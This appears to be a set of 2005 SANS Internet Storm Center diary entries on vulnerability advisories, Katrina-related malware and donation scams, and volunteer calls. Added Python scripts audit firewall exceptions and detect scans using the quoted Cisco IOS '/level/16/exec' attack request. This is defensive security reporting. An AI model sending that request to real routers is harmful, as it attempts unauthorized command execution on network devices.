An unpatched vulnerability was disclosed today in the Firefox browser. According to the advisory, "...the vulnerability is caused due to an error in the handling of an URL that contains the 0xAD character in its domain name. This can be exploited to cause a heap-based buffer overflow.
Successful exploitation crashes Firefox and may potentially allow code execution but requires that the user is tricked into visiting a malicious web site or open a specially crafted HTML file."
Let's hope for a quick patch!
You can check the original advisory at Security Protocols and Secunia
Thanks Pat for pointing this out.
-------------------------------------------------------------------
Handler on Duty: Pedro Bueno < pbueno $$ isc . sans . org >
0 Comments
Cisco content switch SSL vulnerability
http://www.cisco.com/warp/public/707/cisco-sn-20050908-css.shtml
The scope appears to be limited. You must be using certificate authentication and the CSS must be the SSL server. In the affected cases, if SSL fails to renegotiate a session at the appropriate time, it may be possible to bypass authentication. Those using SSL are strongly encouraged to upgrade as soon as possible.
0 Comments
After 24 hours of fun we are back online!
0 Comments
Major Cisco IOS Vulnerability Announced
The affected versions of Cisco IOS are 12.2ZH, 12.2ZL, 12.3, 12.3T, 12.4, and 12.4T (all versions). The vulnerability will not affect devices that are not configured for Firewall Authentication Proxy for FTP or Telnet Sessions. There is a rather large table of remediation options that is included with Cisco's advisory. FrSIRT and Symantec have this listed as a high risk alert. Either turn off the authentication proxy or patch your devices as soon as possible.
0 Comments
ISC/DShield Network Downtime
Most of the connectivity has been restored, but the site is still sluggish. Our ISP (Sprint) is currently working on a resolution.
0 Comments
Cyber-Looting update
In particular our handler Tom Liston is tirelessly verifying hurricane related URLs to find new cyber looters. In a couple cases, we found well meaning URLs, which are indistinguishable from fake "cyber looting" sites.
If you registered a URL related to Katrina and are collecting donations, please identify which 501(c) you are associated with and provide contact information. If you are using a personal PayPal account, please consider that by collecting the money and passing it on to a charity, you will lose whatever commission PayPal is charging you. It may be more efficient to just link to the charity of your choice.
Just to illustrate the problem, here is a graph showing the number of 'katrina' domains registered over the last couple of days:
0 Comments
Continued great response to call for Volunteers
Please use our Contact Page to sign up. Do not upload Word documents or PDFs, but please just include details in plain text.
0 Comments
New Diary Format
Starting with this diary, we will no longer create one daily diary, but instead one or more "stories". Each story may be created by a different handler, and some stories may span more than one day. This will allow us to keep thoughts together for events that last more than one day.
In addition, handlers now have a nicer editor to create diaries, allowing for more formatting options. For example, we can now include images and tables.
Old diaries will remain 'one story'. We may break them up in the future. Soon, you will be able to compare different versions of a story as it may change.
0 Comments
Volunteer Response; OpenSSH issues; Bluetooth delay
Volunteer Response
I've spent most of the day updating the contact database of people volunteering to help out with the Red Cross kiosk project, see http://isc.sans.org/diary.php?date=2005-09-04
My fingertips are still warm, but it's a good pain.
OpenSSH issues
An update to OpenSSH, version 4.2p1, was released addressing issues with GSSAPI and port forwarding. You can grab the latest here: ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/
More on the vulnerabilities:
http://secunia.com/advisories/16686/
http://www.securityfocus.com/bin/14727
http://xforce.iss.net/xforce/xfdb/22115
Bluetooth delay
When I last posted, I mentioned performing a Bluetooth audit of a disaster drill. I received a few questions on what I did to perform the audit. Sadly, today was spent hopping between Storm Center work and Red Cross work, so I don't have the promised article ready yet. Perhaps my next shift...
0 Comments
Call for Volunteers ; Red Cross Associated Sites ; Katrina Related Fraud Continues
Call for Volunteers
The Red Cross needs volunteers with system administration, network engineering and information security (infosec) expertise to assist in the design and implementation of a network of Internet kiosks. These kiosks will be deployed to all of the Red Cross shelters to be used by people displaced by the hurricane and flooding to report that they are alive and to try to contact others.
The Red Cross will be requiring a great deal of help to stand up the infrastructure as well as to actively safeguard it from eventual infection attempts from bots, worms, viruses, spyware and other sorts of malware.
Once we have accurate point-of-contact (POC) information for the Red Cross for this, we will post it in the ISC diary so folks can contact the Red Cross directly. In the meantime, if you are interested in helping the Red Cross in this challenge, please submit your contact information and availability to the Internet Storm Center here and we will pass your information on to the Red Cross. Please provide your name, location, phone number where you can be reached, and an email address. Also, a short list or summary of the skills you can provide.
SANS and the ISC would like to encourage folks with GIAC certifications and a desire to volunteer to help out the Red Cross with this effort. Even if this specific method of assistance is not feasible for you, any way in which you can assist the Red Cross, either nationally or in your local chapter, or perhaps assist another charitable organization such as the Salvation Army or local organizations, would be greatly appreciated at this time.
For more information about this technical challenge the Red Cross is facing, please see this article from the Washington Post.
One other request - the Shared Resources High Frequency Radio Program (SHARES) at the US Department of Homeland Security is looking for assistance from the amateur radio community to assist in running SHARES stations. According to a note from SHARES, "...we always can use more SHARES operators in additon to the 1,200 we already have in our databases. We definitely could use more SHARES stations directly in the affected area, such as New Orleans, Baton Rouge, etc. Have them at key places, such as EOCs, refugee camps, logistic centers are all smart ideas." Contact information for those able to assist is at http://www.ncs.gov/n3/shares/contact.html
Red Cross Associated Sites
The Red Cross has posted a list of official cash donation sites for businesses and organizations affiliated with the Red Cross. This list is not all-inclusive but can be used as a starting point.
Katrina Related Fraud Continues
We continue to see more and more new web sites popping up proclaiming to be charitable organizations collecting donations for folks affected by Katrina. While there are some valid new sites out there, by far the majority of these continue to be nefarious in nature, set up by folks just out to make a quick buck.
If you wish to make a donation of cash or materials to help folks impacted by Katrina, I would recommend you provide your donations to an older, established organization and not to one formed in the last week. While there are valid new charities out there, they are quite possibly just learning how to deal with the distribution of the donations. An established organization should already have procedures, contacts and experience for dealing with the distribution of donations.
---------------
David Goldsmith
dgoldsmith at sans.org
0 Comments
New Windows update; Katrina information still flowing
Windows Update
One of our readers, Thomas, submitted this morning that Microsoft has released a new update. This update applies to Microsoft Windows XP Service Pack 2 (SP2) or Microsoft Windows Server 2003 Service Pack 1 (SP1). This patch fixes a condition where an exception may not show up in the Windows Firewall GUI if this exception is created by modifying the registry directly. In order to do this, administrative privileges are required on the box. The danger in this flaw is that a hacker could open a backdoor that would not be shown in the GUI firewall ruleset. Just a side note, MS is not calling this a flaw, but an "unexpected behavior".
Article Link
http://support.microsoft.com/kb/897663
Download link
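The practical lesson of that update is that the GUI is not the authoritative record of firewall exceptions; the registry is. The following audit script is an added example (not from the ISC diary and not Microsoft's code) that parses the text of a .reg export of the firewall policy key and lists every exception stored there, whether or not the GUI displays it. The key paths and the "port:protocol:scope:state:name" value layout are what the editor recalls for XP SP2 / 2003 SP1 and should be treated as assumptions to verify against an export from your own host; the sample export is constructed.

```python
"""Audit Windows Firewall exceptions straight from a .reg export.

Added example, not from the ISC diary or from Microsoft. Key paths and value
format are assumptions (what the editor recalls for XP SP2 / 2003 SP1).
"""
import re
from dataclasses import dataclass
from typing import List, Optional

POLICY = (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess"
          r"\Parameters\FirewallPolicy\StandardProfile")
PORT_LIST_KEY = POLICY + r"\GloballyOpenPorts\List"          # assumed location
APP_LIST_KEY = POLICY + r"\AuthorizedApplications\List"      # assumed location

# Constructed .reg export: a default file-sharing entry, an application entry,
# and a port exception that was written to the registry rather than the GUI.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"139:TCP"="139:TCP:LocalSubNet:Enabled:@xpsp2res.dll,-22004"
"4444:TCP"="4444:TCP:*:Enabled:Remote Admin"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"C:\\Program Files\\Messenger\\msmsgs.exe"="C:\\Program Files\\Messenger\\msmsgs.exe:*:Enabled:Windows Messenger"
'''

# "name"="value" lines; .reg escapes backslashes and quotes inside strings
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')


@dataclass
class FirewallException:
    kind: str      # "port" or "application"
    target: str    # "4444/TCP" or the executable path
    scope: str     # "*" = any remote address, "LocalSubNet", or an address list
    enabled: bool
    name: str      # display name the GUI would show, if it showed the entry


def _unescape(value: str) -> str:
    return value.replace(r"\\", "\\").replace(r'\"', '"')


def parse_firewall_reg(text: str) -> List[FirewallException]:
    """Walk a .reg export and collect the exceptions under the two list keys."""
    exceptions: List[FirewallException] = []
    current_key: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current_key = line[1:-1]
            continue
        m = VALUE_RE.match(line)
        if not m or current_key is None:
            continue
        value = _unescape(m.group(2))
        if current_key.lower() == PORT_LIST_KEY.lower():
            port, proto, scope, state, name = value.split(":", 4)
            exceptions.append(FirewallException(
                "port", f"{port}/{proto}", scope, state == "Enabled", name))
        elif current_key.lower() == APP_LIST_KEY.lower():
            # rsplit: the executable path itself contains the drive-letter colon
            path, scope, state, name = value.rsplit(":", 3)
            exceptions.append(FirewallException(
                "application", path, scope, state == "Enabled", name))
    return exceptions


def wide_open_exceptions(exceptions: List[FirewallException]) -> List[FirewallException]:
    """Enabled exceptions reachable from any remote address (scope '*')."""
    return [e for e in exceptions if e.enabled and e.scope == "*"]


if __name__ == "__main__":
    found = parse_firewall_reg(SAMPLE_REG)
    for e in found:
        print(f"{e.kind:12} {e.target:45} scope={e.scope:12} enabled={e.enabled} ({e.name})")
    print("Reachable from anywhere:", [e.target for e in wide_open_exceptions(found)])
```

Run against a real export, the list produced here is what to compare against the Windows Firewall Exceptions tab; any entry present in the registry but absent from the GUI is exactly the condition the KB article describes.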
I will be adding new information as it comes in today regarding ways to help the hurricane victims. For now, please take a look at Jim Clausing's excellent write-up yesterday.
http://isc.sans.org/diary.php?date=2005-09-02
The last word
I'd like to give thanx for the help today, and give credit to all those that have been working hard to curb the fraudulent websites popping up.
Thanx to all the other Handlers, including Tom L., Lorna H., Scott F., Dr. J., Marcus S., Patrick N., and the rest of the Handlers. I'd also like to give a *big* thanx to the ISP's out there who've done some 'creative' clean-up on these sites as well.
Thank you!
Tony Carothers
Handler on Duty
0 Comments
IT Help for Katrina victims; More Katrina Malware; Gas shortage hoax e-mail; MS05-043 exploits in the wild?; Scanning for old Cisco vulnerabilities
IT Help For Katrina victims
We did get requests from a number of people who would like to help any way they can. If you know of any web sites where people can offer help, or ask for help, let us know. We will set up a page with links to various sites. If you are in need of IT assistance, or if you would like to provide some, let us know and we will try to match up helpers and people in need. FEMA has a listing of organizations that accept cash donations as well as materials/volunteer contributions: http://www.fema.gov/press/2005/katrinadonations.shtm
UPDATE: (23:25 UTC) One organization that we've been made aware of that is in need of people with technical skills is part-15.org. They are apparently coordinating the FCC/FEMA efforts to reconstruct the communications infrastructure in the disaster area. They have a need for systems integrators and network engineers, see http://www.part-15.org/emergencyrelief/katrina.html Another one that we've been made aware of that is coordinating relief activity for educational institutions (not limited to technical/IT) is Educause.
END UPDATE
Our handler Kevin notes: "For those that are action oriented, contact your local chapter of the American Red Cross (use the "find your local chapter feature" here: http://www.redcross.org/services/disaster ) and talk to their volunteer services coordinator. They will enter you into their training program (I know that a lot are accelerating the training for national responders now.) There is plenty of geek-work to be had setting up the communications network to link LANs, wireless, satellite, VoIP, etc. Just be willing to give them three weeks of your life." Do not travel to the disaster area without coordinating with one of the relief agencies first! See http://www.fema.gov and http://www.redcross.org for information on making donations/volunteering.
UPDATE: (17:20 UTC) We received several notes about e-mail purportedly from the American Red Cross, but pointing to arc.convio.net possibly being a scam, this is not the case. They (Convio) are handling online donations for the Red Cross, though they apparently had some problems yesterday. We also received a note from Mike in the InfoSec group at the American Red Cross, asking that any e-mail or web sites that look like they might be scams trying to use the Red Cross name, be forwarded to infosec@usa.redcross.com.
END UPDATE
More Katrina Malware
The latest malware spotted uses the subject line: "Is Government Reaction to Katrina Because of Loss of Life, or Loss of Property?". A link in the email will lead to the malware.
Gas shortage hoax e-mail
There is a hoax e-mail making the rounds about a gas shortage. Don't run out and create a shortage. And now, we have reports from one of our readers (thanx, Rikki) who is seeing e-mails about a gas shortage floating around. The facts are, yes, there have been gas stations that have run out of gasoline. That is mostly because people have flocked to them to fill up fearing a shortage (can you say self-fulfilling prophecy?). Yes, some refining capacity in the US has been impacted by the hurricane, but we won't know the impact of that for some time yet. In the meantime, there is gasoline available in the US, and stations are still getting deliveries. Yes, the prices have gone up and conserving would be a good idea, but there is no evidence of an imminent widespread shortage outside of the areas that suffered direct infrastructure damage earlier this week. Remain calm.
MS05-043 exploit in the wild?
We are hearing about possible exploits for the vulnerability described in MS05-043 (the print spooler service) in the wild. If anyone has captures of such a beast, please share it with our malware group. In any event, since Microsoft rated this vulnerability as critical, I hope everyone is patched by now (a guy can dream, can't he?).
Scanning for old Cisco vulnerabilities
We started hearing reports last week of machines scanning web servers looking for an odd URL. The GET request is
    GET /level/16/exec/-///pwd  HTTP/1.0
This scanning is apparently picking up steam. We're not sure exactly why this is increasing since this exploit is for a Cisco vulnerability from 2001, so hopefully most routers out there have long since been patched against this one (and a number of others that have come after). Also, our usual advice for practicing defense-in-depth suggests that, a) if you don't use the HTTP management feature of the router, turn it off; and b) if you do use it, it should only be accessible from a protected management network.
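Anyone running a web server can confirm whether they are seeing this scan by checking their access logs. The script below is an added example (not from the ISC diary) that runs over constructed Common Log Format lines and flags requests whose path starts with /level/NN/exec; it generalises the diary's `/level/16/exec/-///pwd` request to any privilege level in the URL, since the 2001 IOS HTTP authorization flaw concerned levels above 15, not only 16. The log lines and addresses are constructed.

```python
"""Flag requests for the old Cisco IOS HTTP '/level/NN/exec' URL in web logs.

Added example, not from the ISC diary; sample log lines are constructed.
"""
import re
from collections import Counter
from typing import Dict, List, NamedTuple, Optional

# Common Log Format: host ident authuser [date] "method path proto" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+$'
)
# Path must begin with /level/<NN>/exec; the remainder is the IOS command part.
# Anchoring at ^ keeps /images/level/16/exec/... from matching.
CISCO_EXEC_RE = re.compile(r'^/level/(?P<level>\d{1,2})/exec(?P<rest>/\S*)?$')

# Constructed access log: two scanning sources, one normal client, one decoy path
SAMPLE_LOG = """\
192.0.2.10 - - [02/Sep/2005:14:03:11 +0000] "GET /level/16/exec/-///pwd HTTP/1.0" 404 209
192.0.2.10 - - [02/Sep/2005:14:03:12 +0000] "GET /level/17/exec/-///show/running HTTP/1.0" 404 209
198.51.100.7 - - [02/Sep/2005:14:05:40 +0000] "GET /index.html HTTP/1.1" 200 5120
203.0.113.5 - - [02/Sep/2005:14:07:02 +0000] "GET /level/16/exec/- HTTP/1.0" 404 209
198.51.100.7 - - [02/Sep/2005:14:09:00 +0000] "GET /images/level/16/exec/pwd HTTP/1.1" 404 209
"""


class Hit(NamedTuple):
    host: str
    time: str
    level: int
    rest: str      # raw text after "/exec", e.g. "/-///pwd"
    status: int


def match_cisco_exec(line: str) -> Optional[Hit]:
    """Return a Hit if the log line is a /level/NN/exec request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    c = CISCO_EXEC_RE.match(m.group("path"))
    if not c:
        return None
    return Hit(m.group("host"), m.group("time"), int(c.group("level")),
               c.group("rest") or "", int(m.group("status")))


def detect_cisco_exec_scans(lines: List[str]) -> List[Hit]:
    """All matching requests, in log order."""
    return [h for h in (match_cisco_exec(l) for l in lines) if h is not None]


def hits_per_host(hits: List[Hit]) -> Dict[str, int]:
    """Count matching requests by source address (handy for a block/watch list)."""
    return dict(Counter(h.host for h in hits))


if __name__ == "__main__":
    hits = detect_cisco_exec_scans(SAMPLE_LOG.splitlines())
    for h in hits:
        print(f"{h.time}  {h.host:15} level={h.level:<3} rest={h.rest!r} status={h.status}")
    print("Requests per source:", hits_per_host(hits))
```

On a web server these requests are noise (the 404s above are what a non-Cisco host returns); on a router with the HTTP server still enabled they are the reason the diary recommends turning that feature off or restricting it to a management network.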
Happy Labor Day
For those of you in the US, I hope you have a happy, uneventful holiday weekend.
-----------------
Jim Clausing (with mucho help from the other handlers, thanx gang)
Chief Bot Herder
0 Comments
Katrina Malware; Katrina Donation Scams (now with domain name list); Dameware
Katrina Malware
It didn't take long. This morning, we received an email which is promising news about the Hurricane. However, the site it links to appears to provide malware in addition to a brief news article. The text of the email (the original is in HTML):
Subject: Re: u1 Katrina killed as many as 80 people.
Just before daybreak Tuesday, Katrina, now a tropical storm, was 35 miles northeast of Tupelo, Miss., moving north-northeast with winds of 50 mph. Forecasters at the National Hurricane Center said the amount of rainfall has been adjusted downward Monday. Mississippi Gov. Haley Barbour said Tuesday that Hurricane Katrina killed as many as 80 people in his state and burst levees in Louisiana flooded New Orleans. Read More..
'Read More..' links to nextermest.com [DO NOT VISIT! MALWARE!]. We are currently analyzing this page. It uses obfuscated javascript to download what looks like a .hta exploit.
Katrina Donation Scams
A couple of the domains we discovered yesterday removed the paypal button. Again, please let us know if you find any suspect domains. There are now about 230 .com domains that contain the strings 'katrina' and 'hurrican'. We could use your help checking out domains we found that 'sound suspect'. These have been filtered from the .com zone file using keywords like 'katrina'. Lots of innocent domains, so don't use it as a block list just yet. We are trying to annotate this list as needed. NOTE: If you send us an annotation to add, we will add an e-mail address of yours to 'sign' the comment. The email address will be obfuscated. Unsigned comments come from our ISC handler team.
http://isc.sans.org/katrina.com.txt
Susan Bradley had this nice remark about "cyber looting" on the patch management list: "to the folks behind this one....sick guys....really sick... you know how much small businesses are going to need geek/IT help in the coming months and all you guys can do is to code up stuff like this? How about donating to the red cross? How about volunteering to help a small business owner displaced by Katrina reset up MX records, A records? How about doing something useful instead of this stuff? Okay rant box off"
Dameware Exploit
We do see pretty strong scanning for the recent Dameware exploit. The Dameware.com site is located in New Orleans and not reachable since the storm. However, you can download the latest version from the UK site: http://www.dameware.co.uk/thankyoudownload.asp?group=Downloads (thanks David for the UK URL).
--------
0 Comments